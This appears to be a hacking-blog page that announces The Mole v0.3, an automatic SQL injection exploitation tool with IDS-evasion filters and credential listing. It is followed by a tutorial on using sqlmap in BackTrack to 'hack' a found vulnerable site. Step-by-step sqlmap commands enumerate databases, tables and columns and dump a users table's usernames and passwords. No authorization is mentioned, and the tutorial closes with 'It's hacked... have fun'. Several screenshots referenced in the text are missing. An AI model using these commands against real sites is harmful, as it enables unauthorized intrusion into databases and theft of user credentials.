The Mole(SQL Injection exploitation tool) v0.3 released

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique. The Mole features and tutorial has been discussed before but the new version of Mole (v3.0) has been released and available to download.

Features

• Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
• Command line interface. Different commands trigger different actions.
• Auto-completion for commands, command arguments and database, table and columns names.
• Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
• Exploits SQL Injections through GET/POST/Cookie parameters.
• Developed in python 3.
• Exploits SQL Injections that return binary data.
• Powerful command interpreter to simplify its usage. 

Current Release: v0.3 (2012-03-02)

• Windows 32bit executable: themole-0.3-win32.zip
• Tarball-gzipped format: themole-0.3-lin-src.tar.gz
• Zip format: themole-0.3-win-src.zip 

Current Bug-Free version

Even though we want to keep the release up-to-date, it is impossible to make one for every single patch we have applied to the current version to fix a bug. We strongly recommend using thebugfix branch from our repository. To get it, execute:

git clone -b bugfix git://git.code.sf.net/p/themole/code themole-code

In order to put it up to date, before using it, update it by executing:

git pull origin bugfix

The Mole's release 0.3 is out! Several bugfixes have been made and new features were introduced. As:

* Enabled injection through cookie paramters.
* New filtering mechanism enabling better manipulation and easier filter development.
* Added several of those filters.
* SQL Injections that return binary data are now exploitable.
* DMBS credentials listing.

The Mole SQLi Exploitation Tool Tutorial

Complete tutorial with video explanation can be find here.

SQL Injection with SQLmap [BackTrack Tool]

Hello again guyz This is Maher Bro :)

today I'm going to show you how to hack SQL Vuln. site with SQLmap in BackTrack 5

first of all find a Vuln. site.. you can see how in SQL injection tutorial :)

second of all open BackTrack > Terminal; then type:

cd /pentest/database/sqlmap

hit Enter.
Now we are inside SQLmap, lets start hacking :P

####################################################################

Now the command we will need here is:

+++++++++++++++++++++++++++++++++++++++++
-D         <= define the database
-T          <= define the table
-C          <= define the column
--dbs     <= bring DataBases names
--tables  <= bring table names
--columns <=bring columns names
--dump    <= dump the data out of the column
++++++++++++++++++++++++++++++++++++++++++

###################################################################



Lets start :)

our first command will be:

./sqlmap.py -u www.website.com/index.php?id=13 --dbs    <= Example!

 it will look like:

then we will get the Databases names like:

now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables" :)
so we will type:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name --tables

I choose walnut_live database so I typed:

 and the results will be the tables name of course :P
it will look like:

now we got the tables and found the users table!!
now we will select this table by "-T" command and ofcourse we already selected our database, so now we will write the same command, but we will replace "--tables" and put "-T" table_name which is "users" table and then ask for the columns inside that table by "--columns" command it will be like

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --columns

it will look like:

 now we will get the results, the columns
they will come like this:

as you can see we got "id, pass, and user" columns
now we want the data from them so we will dump the data :P with "--dump"
but in this one we have two ways to get them..
we can dump all the data at once, Or select the column and get the data from
I will show you how both of them look like and used..

first we can get all the data by this command:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --dump

which will get us all the data at once and will look like this:

 and the result is:

In the picture I marked the user and pass :)
now we will try getting them one by one with this command:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump

for example I will get user and pass:

User::

 result::

pass::

result::

######################################################################

we are done!!
It's hacked, we got the User, and Password :)
have fun